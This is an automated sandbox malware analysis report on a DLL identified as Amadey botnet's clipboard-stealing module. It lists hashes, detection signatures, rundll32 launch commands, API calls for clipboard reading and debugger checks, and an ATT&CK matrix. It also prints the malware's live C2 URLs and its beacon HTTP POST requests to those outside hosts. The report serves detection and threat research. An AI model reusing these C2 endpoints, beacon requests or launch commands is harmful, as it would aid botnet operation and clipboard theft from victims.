Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
D72j5I83wU.dll

Overview

General Information

Sample name:D72j5I83wU.dll
renamed because original name is a hash value
Original sample name:c2f3fbbbe6d5f48a71b6b168b1485866.dll
Analysis ID:1574266
MD5:c2f3fbbbe6d5f48a71b6b168b1485866
SHA1:1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256:c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
Tags:Amadeydlluser-abuse_ch
Infos:

Detection

Amadey
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadeys Clipper DLL
C2 URLs / IPs found in malware configuration
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7380 cmdline: loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7436 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7476 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7452 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7564 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7612 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7744 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7752 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7760 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10"}
SourceRuleDescriptionAuthorStrings
D72j5I83wU.dllJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    SourceRuleDescriptionAuthorStrings
    11.2.rundll32.exe.6e4e0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      7.2.rundll32.exe.6e4e0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-13T07:48:45.709940+010028561511A Network Trojan was detected192.168.2.1149716185.81.68.14880TCP
        2024-12-13T07:48:48.330355+010028561511A Network Trojan was detected192.168.2.1149723185.81.68.14880TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://185.81.68.147/7vhfjke3/index.php_Avira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpfAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/Fvu5jh4DbS/index.phpAvira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpwAvira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpSAvira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpPAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php~Avira URL Cloud: Label: phishing
        Source: http://185.81.68.147/7vhfjke3/index.phpAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_BrAvira URL Cloud: Label: phishing
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpAvira URL Cloud: Label: malware
        Source: http://185.81.68.148/8Fvu5jh4DbS/index.php-Avira URL Cloud: Label: phishing
        Source: D72j5I83wU.dllMalware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10"}
        Source: D72j5I83wU.dllReversingLabs: Detection: 47%
        Source: D72j5I83wU.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: D72j5I83wU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4EBCEE FindFirstFileExW,7_2_6E4EBCEE

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.11:49716 -> 185.81.68.148:80
        Source: Network trafficSuricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.11:49723 -> 185.81.68.148:80
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80Jump to behavior
        Source: Malware configuration extractorIPs: 185.81.68.148
        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: global trafficHTTP traffic detected: POST /8Fvu5jh4DbS/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.148Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
        Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
        Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.148
        Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E1EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,7_2_6E4E1EC0
        Source: unknownHTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
        Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
        Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpP
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpS
        Source: rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.php_
        Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpw
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3789321814.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
        Source: rundll32.exe, 0000000B.00000002.3790521828.00000000032F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php-
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpf
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phph=d4_Br
        Source: rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php~
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E61000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.148/Fvu5jh4DbS/index.php
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E31B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6E4E31B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E31B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,7_2_6E4E31B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E31B07_2_6E4E31B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4F1AB17_2_6E4F1AB1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4E73B0 appears 34 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4E5D90 appears 103 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E4E6B05 appears 47 times
        Source: D72j5I83wU.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
        Source: classification engineClassification label: mal92.troj.spyw.evad.winDLL@18/0@0/2
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
        Source: D72j5I83wU.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: D72j5I83wU.dllReversingLabs: Detection: 47%
        Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,MainJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@ZJump to behavior
        Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",MainJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: D72j5I83wU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
        Source: D72j5I83wU.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: D72j5I83wU.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 4181Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 5814Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 3627Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 6370Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep count: 4181 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep time: -4181000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep count: 5814 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616Thread sleep time: -5814000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764Thread sleep count: 3627 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764Thread sleep time: -3627000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764Thread sleep count: 6370 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exe TID: 7764Thread sleep time: -6370000s >= -30000sJump to behavior
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4EBCEE FindFirstFileExW,7_2_6E4EBCEE
        Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
        Source: rundll32.exe, 0000000B.00000002.3790521828.000000000327A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E7B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3790521828.00000000032EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: rundll32.exe, 00000007.00000002.3789321814.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E7288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6E4E7288
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4EA254 mov eax, dword ptr fs:[00000030h]7_2_6E4EA254
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4EB881 mov eax, dword ptr fs:[00000030h]7_2_6E4EB881
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4ED218 GetProcessHeap,7_2_6E4ED218
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E7288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6E4E7288
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E6B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6E4E6B1A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E9820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6E4E9820

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.147 80Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.81.68.148 80Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E70A7 cpuid 7_2_6E4E70A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E4E73F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_6E4E73F8

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: D72j5I83wU.dll, type: SAMPLE
        Source: Yara matchFile source: 11.2.rundll32.exe.6e4e0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.rundll32.exe.6e4e0000.0.unpack, type: UNPACKEDPE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        111
        Process Injection
        11
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        111
        Process Injection
        LSASS Memory21
        Security Software Discovery
        Remote Desktop Protocol2
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture11
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Rundll32
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials12
        System Information Discovery
